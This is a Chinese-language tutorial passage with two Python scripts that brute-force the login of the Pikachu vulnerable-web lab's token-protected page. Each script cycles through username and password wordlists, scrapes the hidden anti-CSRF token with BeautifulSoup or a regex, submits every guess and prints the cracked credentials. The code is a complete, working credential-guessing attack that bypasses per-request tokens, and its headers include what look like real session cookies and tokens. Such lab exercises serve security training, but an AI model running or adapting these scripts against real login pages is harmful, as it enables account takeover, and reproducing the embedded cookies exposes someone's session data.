第一种——基于Beautiful Soup库（数据解析）和re模块

代码如下：

import re
import requests
from bs4 import BeautifulSoup
with open('user.txt','r') as user:
    for username in user:
        #print (username.strip())
        with open('password.txt','r') as passwd:
            for password in passwd:
                #print (password.strip())
                url = "http://x.x.x.x/pikachu/vul/burteforce/bf_token.php"
                header = {
                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
                    'Cookie': 'request_token=78gUEJrz2WPS3xN1XfqiXeGy2tgiHd8CxpzVAOSavBj4c8lA; pro_end=-1; ltd_end=-1; serverType=apache; order=id%20desc; memSize=1837; bt_user_info=%7B%22status%22%3Atrue%2C%22msg%22%3A%22%u83B7%u53D6%u6210%u529F%21%22%2C%22data%22%3A%7B%22username%22%3A%22151****1573%22%7D%7D; a3446a883d49d56e7e3ab64c9f2af2ad=d5a8f18a-489e-4beb-bca0-ee0272edea2f.b_FsvtXQq2JqFu6tBwn3MguJILs; JSESSIONID=B3B6110EF5A065700776C0554D642C4B; PHPSESSID=9cujklrgmm4qlsnhus8pa5ihbb'
                }
                r = requests.get(url,headers=header)
                #print (r.text)
                token = BeautifulSoup(r.text,'lxml').find('input',{'name':'token'}).get('value')#bs库匹配r.text
                #print (token)

                data = {
                    'username':username.strip(),
                    'password':password.strip(),
                    'token':token,
                    'submit':'Login'
                }
                res = requests.post(url=url,headers=header,data=data)
                print (res.text)
                if  re.findall('login success',res.text):
                        print ('破解成功啦，杀世子，夺青鸟！')
                        print ("用户名是：", username.strip())
                        print ("密码是：", password.strip())

输出结果：

 第二种——只基于re模块，正则表达式匹配

代码如下：

import re
import requests
#from bs4 import BeautifulSoup
with open('user.txt','r') as user:
    for username in user:
        #print (username.strip())
        with open('password.txt','r') as passwd:
            for password in passwd:
                #print (password.strip())
                url = "http://x.x.x.x/pikachu/vul/burteforce/bf_token.php"
                header = {
                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
                    'Cookie': 'request_token=78gUEJrz2WPS3xN1XfqiXeGy2tgiHd8CxpzVAOSavBj4c8lA; pro_end=-1; ltd_end=-1; serverType=apache; order=id%20desc; memSize=1837; bt_user_info=%7B%22status%22%3Atrue%2C%22msg%22%3A%22%u83B7%u53D6%u6210%u529F%21%22%2C%22data%22%3A%7B%22username%22%3A%22151****1573%22%7D%7D; a3446a883d49d56e7e3ab64c9f2af2ad=d5a8f18a-489e-4beb-bca0-ee0272edea2f.b_FsvtXQq2JqFu6tBwn3MguJILs; JSESSIONID=B3B6110EF5A065700776C0554D642C4B; PHPSESSID=9cujklrgmm4qlsnhus8pa5ihbb'
                }
                r = requests.get(url,headers=header)
                #print (r.text)
                #token = BeautifulSoup(r.text,'lxml').find('input',{'name':'token'}).get('value') #bs库匹配
                token = re.findall('<input type="hidden" name="token" value="(.*?)"',r.text) #re正则表达式匹配
                #print (token)

                data = {
                    'username':username.strip(),
                    'password':password.strip(),
                    'token':token,
                    'submit':'Login'
                }
                res = requests.post(url=url,headers=header,data=data)
                #print (res.text)
                if  re.findall('login success',res.text):
                        print ('破解成功啦，杀世子，夺青鸟！')
                        print ("用户名是：", username.strip())
                        print ("密码是：", password.strip())

输出结果：